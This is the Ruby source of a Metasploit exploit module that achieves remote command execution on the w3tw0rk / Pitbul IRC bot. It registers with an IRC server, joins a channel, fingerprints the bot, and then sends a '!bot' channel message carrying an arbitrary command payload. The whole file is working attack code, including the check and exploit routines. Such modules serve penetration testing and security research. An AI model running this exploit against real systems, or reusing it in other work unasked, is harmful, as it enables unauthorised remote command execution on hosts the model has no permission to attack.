GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/w3tw0rk_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
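class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # IRC numeric replies (RFC 2812, section 5.2) that the module keys on. The
  # server output is matched as free text, so a reply is recognised anywhere
  # in the buffer drained after the preceding command.
  # 463 ERR_NOPERMFORHOST / 464 ERR_PASSWDMISMATCH: registration refused.
  REGISTRATION_REFUSED = /46[34]/
  # 353 RPL_NAMREPLY / 366 RPL_ENDOFNAMES: the JOIN was accepted.
  JOIN_ACCEPTED = /353|366/
  # RFC 2812 limits a nickname to nine characters.
  MAX_NICK_LENGTH = 9

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution',
        'Description' => %q{
          This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.
        },
        'Author' => [
          'Jay Turla'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '120384' ],
          [ 'EDB', '36652' ]
        ],
        'Platform' => %w{unix win},
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd'
          }
        },
        'Targets' => [
          [ 'w3tw0rk', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2015-06-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ]
    )
  end

  # The IRC session may be password protected (IRC_PASSWORD), so the module
  # reports itself to the framework as one that uses supplied credentials.
  def post_auth?
    true
  end

  # Probes the target: registers with the server, joins CHANNEL and looks for
  # the bot's greeting in the JOIN response.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the server refuses the
  #   registration or the JOIN, Vulnerable when the JOIN response carries the
  #   expected "auth" / "logged in" text, Safe otherwise.
  def check
    connect

    res = register(sock)
    if res.match?(REGISTRATION_REFUSED)
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    # Was `!res =~ /353/ && !res =~ /366/`, which parses as `(!res) =~ ...`
    # and never detected a failed JOIN (and raises on rubies without Object#=~).
    unless res.match?(JOIN_ACCEPTED)
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)

    # The fingerprint is the text the bot emits when a user joins, not the
    # result of any command.
    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  ensure
    # The early returns above used to leave the socket open; close it on
    # every path (disconnect tolerates an unset socket).
    disconnect
  end

  # Writes +data+ to +sock+ and drains whatever the server sends back.
  #
  # Reads with a one-second timeout until a read yields nothing; EOF and
  # timeout errors are logged and end the drain instead of aborting the run.
  #
  # @param sock the connected socket established by +connect+
  # @param data [String] raw IRC line(s), CRLF terminated
  # @return [String] everything read after the write, possibly empty
  def send_msg(sock, data)
    sock.put(data)
    response = String.new
    begin
      while (chunk = sock.get_once(-1, 1))
        response << chunk
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog(e)
    end
    response
  end

  # Sends the PASS (only when IRC_PASSWORD is set), NICK and USER lines that
  # register the session.
  #
  # A NICK longer than the RFC 2812 limit is replaced by a random alphabetic
  # nick of the maximum length, and the substitution is reported.
  #
  # @param sock the connected socket established by +connect+
  # @return [String] the server's reply, see #send_msg
  def register(sock)
    msg = String.new
    password = datastore['IRC_PASSWORD']
    msg << "PASS #{password}\r\n" if password && !password.empty?

    nick = datastore['NICK']
    if nick.length > MAX_NICK_LENGTH
      nick = rand_text_alpha(MAX_NICK_LENGTH)
      print_error("The nick is longer than #{MAX_NICK_LENGTH} characters, using #{nick}")
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock, msg)
  end

  # Joins the configured CHANNEL.
  #
  # @param sock the connected socket established by +connect+
  # @return [String] the server's reply, see #send_msg
  def join(sock)
    send_msg(sock, "JOIN #{datastore['CHANNEL']}\r\n")
  end

  # Delivers the encoded payload to the bot as a channel message carrying the
  # "!bot" prefix the bot reacts to.
  #
  # @param sock the connected socket established by +connect+
  # @return [String] the server's reply, see #send_msg
  def w3tw0rk_command(sock)
    send_msg(sock, "PRIVMSG #{datastore['CHANNEL']} :!bot #{payload.encoded}\r\n")
  end

  # Sends QUIT without waiting for a reply.
  #
  # @param sock the connected socket established by +connect+
  def quit(sock)
    sock.put("QUIT :bye bye\r\n")
  end

  # Registers, joins CHANNEL, delivers the payload and leaves. A refused
  # registration or JOIN is reported and aborts the run; the socket is closed
  # on every path.
  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res.match?(REGISTRATION_REFUSED)
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    # Same precedence fix as in #check: the old `!res =~ ...` form never fired.
    unless res.match?(JOIN_ACCEPTED)
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
    w3tw0rk_command(sock)

    quit(sock)
  ensure
    disconnect
  end
end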